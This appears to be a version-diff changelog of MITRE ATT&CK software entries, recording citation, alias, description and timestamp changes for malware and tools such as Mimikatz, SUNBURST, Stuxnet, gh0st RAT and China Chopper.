external_references[3]['source_name']NCSC Joint Report Public ToolsGithub PowerShell Empire
external_references[3]['description']The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
external_references[3]['url']https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-toolshttps://github.com/PowerShellEmpire/Empire
external_references[4]['source_name']Github PowerShell EmpireGitHub ATTACK Empire
external_references[4]['description']Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.
external_references[4]['url']https://github.com/EmpireProject/Empirehttps://github.com/dstepanic/attck_empire
external_references[5]['source_name']GitHub ATTACK EmpireNCSC Joint Report Public Tools
external_references[5]['description']Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
external_references[5]['url']https://github.com/dstepanic/attck_empirehttps://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools
x_mitre_version1.31.5

[S0002] Mimikatz

Current version: 1.6

Version changed from: 1.4 → 1.6

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-20 14:25:59.596000+00:002022-08-03 15:07:11.534000+00:00
x_mitre_version1.41.6

[S0097] Ping

Current version: 1.2

Version changed from: 1.0 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Linux', 'Windows', 'macOS']
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-10-13 18:56:52.195000+00:00
x_mitre_version1.01.2
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasesping.exe

[S0012] PoisonIvy

Current version: 2.1

Version changed from: 1.3 → 2.1


Old Description
New Description
t1[PoisonIvy](https://attack.mitre.org/software/S0012) is a pot1[PoisonIvy](https://attack.mitre.org/software/S0012) is a po
>pular remote access tool (RAT) that has been used by many gr>pular remote access tool (RAT) that has been used by many gr
>oups. (Citation: FireEye Poison Ivy) (Citation: Symantec Eld>oups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elder
>erwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)>wood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:58:17.100000+00:002022-09-30 21:02:39.862000+00:00
description[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)
external_references[1]['source_name']PoisonIvyPoison Ivy
external_references[2]['source_name']Poison IvyPoisonIvy
external_references[2]['description'](Citation: FireEye Poison Ivy) (Citation: Symantec Darkmoon Sept 2014)(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Sept 2014)
external_references[3]['source_name']DarkmoonBreut
external_references[3]['description'](Citation: Symantec Darkmoon Sept 2014)(Citation: Novetta-Axiom)
external_references[4]['source_name']FireEye Poison IvyDarkmoon
external_references[4]['description']FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.(Citation: Symantec Darkmoon Sept 2014)
external_references[5]['source_name']Symantec Elderwood Sept 2012FireEye Poison Ivy
external_references[5]['description']O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.
external_references[5]['url']https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdfhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
external_references[7]['source_name']Symantec Darkmoon Sept 2014Novetta-Axiom
external_references[7]['description']Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.
external_references[7]['url']https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaignhttp://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_version1.32.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'}
external_references{'source_name': 'Symantec Darkmoon Sept 2014', 'description': 'Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.', 'url': 'https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign'}
x_mitre_aliasesBreut

[S0147] Pteranodon

Current version: 2.1

Version changed from: 1.1 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
values_changed
STIX FieldOld valueNew Value
modified2020-06-22 17:54:15.287000+00:002022-08-23 15:25:11.145000+00:00
external_references[1]['source_name']Palo Alto Gamaredon Feb 2017Pterodo
external_references[1]['description']Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.(Citation: Symantec Shuckworm January 2022)(Citation: Secureworks IRON TILDEN Profile)
x_mitre_version1.12.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'}
external_references{'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'}
external_references{'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'}
x_mitre_aliasesPterodo

[S0332] Remcos

Current version: 1.3

Version changed from: 1.1 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:03:42.421000+00:002022-09-16 15:40:41.093000+00:00
external_references[2]['source_name']Riskiq Remcos Jan 2018Fortinet Remcos Feb 2017
external_references[2]['description']Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.
external_references[2]['url']https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html
external_references[4]['source_name']Fortinet Remcos Feb 2017Riskiq Remcos Jan 2018
external_references[4]['description']Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
external_references[4]['url']https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.htmlhttps://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
x_mitre_version1.11.3

[S0559] SUNBURST

Current version: 2.3

Version changed from: 2.1 → 2.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 15:01:16.538000+00:002022-07-29 19:52:40.476000+00:00
external_references[3]['source_name']SolarWinds Sunburst Sunspot Update January 2021FireEye SUNBURST Backdoor December 2020
external_references[3]['description']Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
external_references[3]['url']https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
external_references[5]['source_name']FireEye SUNBURST Backdoor December 2020SolarWinds Sunburst Sunspot Update January 2021
external_references[5]['description']FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.htmlhttps://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
x_mitre_version2.12.3

[S0615] SombRAT

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1[SombRAT](https://attack.mitre.org/software/S0615) is a modut1[SombRAT](https://attack.mitre.org/software/S0615) is a modu
>lar backdoor written in C++ that has been in use since at le>lar backdoor written in C++ that has been used since at leas
>ast 2019. [SombRAT](https://attack.mitre.org/software/S0615)>t 2019 to download and execute malicious payloads, including
> has been used to download and execute malicious payloads, i> [FIVEHANDS](https://attack.mitre.org/software/S0618) ransom
>ncluding [FIVEHANDS](https://attack.mitre.org/software/S0618>ware.(Citation: BlackBerry CostaRicto November 2020)(Citatio
>) ransomware.(Citation: BlackBerry CostaRicto November 2020)>n: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FI
>(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21>VEHANDS May 2021)
>-126A FIVEHANDS May 2021) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:39:53.415000+00:002022-10-05 16:33:54.170000+00:00
description[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)
external_references[1]['source_name']BlackBerry CostaRicto November 2020CISA AR21-126A FIVEHANDS May 2021
external_references[1]['description']The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.
external_references[1]['url']https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourcedhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
external_references[3]['source_name']CISA AR21-126A FIVEHANDS May 2021BlackBerry CostaRicto November 2020
external_references[3]['description']CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.
external_references[3]['url']https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126ahttps://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced
x_mitre_version1.01.2

[S0603] Stuxnet

Current version: 1.2

Version changed from: 1.0 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:50:58.905000+00:002022-10-20 20:31:32.664000+00:00
external_references[2]['source_name']Symantec W.32 Stuxnet DossierCISA ICS Advisory ICSA-10-272-01
external_references[2]['description']Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.
external_references[2]['url']https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01
external_references[3]['source_name']CISA ICS Advisory ICSA-10-272-01ESET Stuxnet Under the Microscope
external_references[3]['description']CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.
external_references[3]['url']https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf
external_references[4]['source_name']ESET Stuxnet Under the MicroscopeSymantec W.32 Stuxnet Dossier
external_references[4]['description']Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.
external_references[4]['url']https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdfhttps://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
x_mitre_version1.01.2

[S0658] XCSSET

Current version: 1.2

Version changed from: 1.0 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 00:43:30.036000+00:002022-10-18 20:40:59.749000+00:00
external_references[1]['source_name']XCSSETOSX.DubRobber
external_references[1]['description'](Citation: trendmicro xcsset xcode project 2020)(Citation: malwarebyteslabs xcsset dubrobber)
external_references[2]['source_name']OSX.DubRobberXCSSET
external_references[2]['description'](Citation: malwarebyteslabs xcsset dubrobber)(Citation: trendmicro xcsset xcode project 2020)
x_mitre_version1.01.2

[S0110] at

Current version: 1.3

Version changed from: 1.1 → 1.3


Old Description
New Description
t1[at](https://attack.mitre.org/software/S0110) is used to scht1[at](https://attack.mitre.org/software/S0110) is used to sch
>edule tasks on a system to run at a specified date or time. >edule tasks on a system to run at a specified date or time.(
>(Citation: TechNet At)>Citation: TechNet At)(Citation: Linux at)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:34:22.227000+00:002022-09-22 20:56:56.049000+00:00
description[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)
external_references[1]['source_name']TechNet AtLinux at
external_references[1]['description']Microsoft. (n.d.). At. Retrieved April 28, 2016.IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.
external_references[1]['url']https://technet.microsoft.com/en-us/library/bb490866.aspxhttps://man7.org/linux/man-pages/man1/at.1p.html
x_mitre_version1.11.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet At', 'description': 'Microsoft. (n.d.). At. Retrieved April 28, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/bb490866.aspx'}

[S0032] gh0st RAT

Current version: 3.1

Version changed from: 2.3 → 3.1


Old Description
New Description
t1[gh0st RAT](https://attack.mitre.org/software/S0032) is a ret1[gh0st RAT](https://attack.mitre.org/software/S0032) is a re
>mote access tool (RAT). The source code is public and it has>mote access tool (RAT). The source code is public and it has
> been used by multiple groups. (Citation: FireEye Hacking Te> been used by multiple groups.(Citation: FireEye Hacking Tea
>am)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgr>m)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgro
>oup Gh0st April 2018)>up Gh0st April 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
external_referenceshttps://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 20:43:13.190000+00:002022-09-30 21:03:21.873000+00:00
description[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)
external_references[2]['source_name']FireEye Hacking TeamMydoor
external_references[2]['description']FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.(Citation: Novetta-Axiom)
external_references[3]['source_name']Arbor Musical Chairs Feb 2018Moudoor
external_references[3]['description']Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.(Citation: Novetta-Axiom)
external_references[4]['source_name']Nccgroup Gh0st April 2018FireEye Hacking Team
external_references[4]['description']Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.
external_references[4]['url']https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
x_mitre_version2.33.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'}
external_references{'source_name': 'Nccgroup Gh0st April 2018', 'description': 'Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.', 'url': 'https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/'}
external_references{'source_name': 'Arbor Musical Chairs Feb 2018', 'description': 'Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.', 'url': 'https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/'}
x_mitre_aliasesMydoor
x_mitre_aliasesMoudoor

[S0385] njRAT

Current version: 1.4

Version changed from: 1.2 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 22:25:02.713000+00:002022-09-16 19:33:56.130000+00:00
external_references[1]['source_name']Njw0rmLV
external_references[1]['description']Some sources have discussed Njw0rm as a later variant of njRAT, where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of njRAT itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Fidelis njRAT June 2013)
external_references[2]['source_name']LVBladabindi
external_references[2]['description'](Citation: Fidelis njRAT June 2013)(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)
external_references[3]['source_name']BladabindiFireEye Njw0rm Aug 2013
external_references[3]['description'](Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.
external_references[5]['source_name']FireEye Njw0rm Aug 2013Trend Micro njRAT 2018
external_references[5]['description']Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.htmlhttps://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/
external_references[6]['source_name']Trend Micro njRAT 2018Njw0rm
external_references[6]['description']Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)
x_mitre_version1.21.4
Metadata-only Changes

[S0504] Anchor

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-05 17:54:53.991000+00:002021-12-15 20:56:24.628000+00:00

[S0606] Bad Rabbit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 18:43:07.613000+00:002022-10-12 17:29:57.200000+00:00
external_references[1]['source_name']Secure List Bad RabbitESET Bad Rabbit
external_references[1]['description']Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.
external_references[1]['url']https://securelist.com/bad-rabbit-ransomware/82851/https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
external_references[2]['source_name']ESET Bad RabbitSecure List Bad Rabbit
external_references[2]['description']M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.
external_references[2]['url']https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/https://securelist.com/bad-rabbit-ransomware/82851/

[S0089] BlackEnergy

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 15:59:03.034000+00:002022-10-12 17:33:00.482000+00:00

[S0635] BoomBox

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:33:59.932000+00:002022-01-18 18:10:37.673000+00:00

[S0482] Bundlore

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 20:26:31.452000+00:002022-02-10 15:37:37.795000+00:00

[S0527] CSPY Downloader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 13:48:19.728000+00:002022-10-18 23:14:56.867000+00:00

[S0020] China Chopper

Current version: 2.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:30:11.979000+00:002022-04-15 15:15:51.199000+00:00
external_references[2]['source_name']Lee 2013CISA AA21-200A APT40 July 2021
external_references[2]['description']Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.
